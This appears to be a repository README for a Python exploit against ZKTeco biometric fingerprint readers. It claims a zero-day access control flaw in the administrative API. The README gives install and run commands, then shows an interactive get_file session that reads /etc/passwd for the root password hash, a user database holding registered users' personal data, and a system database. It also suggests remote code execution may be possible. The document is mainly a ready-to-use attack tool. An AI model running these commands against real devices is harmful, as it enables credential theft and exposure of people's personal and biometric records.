
Zero-day Vulnerability in ZKTEco biometric fingerprint reader.

Primary LanguagePython


Incorrect Access Control in ZKTECO allows remote attackers to read any file via the administrative API.

Installing required modules

  • Inside the directory ZKTEco:
    $ pip install -r ./pyzatt/requirements_dev.txt

Running the exploit

  • Inside the directory ZKTEco:
    $ python exploit.py <ip_address>
    Connected to
    (Cmd) get_file <file_name>
    get_file /etc/passwd: Disclosed root password's hash
    get_file /mnt/mtdblock/data/ZKDB.db: Disclosed PII of registered users. To read the contents, you might need to run this command sequentially as many times till the whole contents
    get disclosed
    get_file /mnt/mtdblock/data/ZKSystem.db: Disclosed sensitive information related to the system



The devices could be potentially vulnerable to Remote Code Execution as well through the use of the administrative API. The exploit mentioned in credits section could be a good place to find a test for it.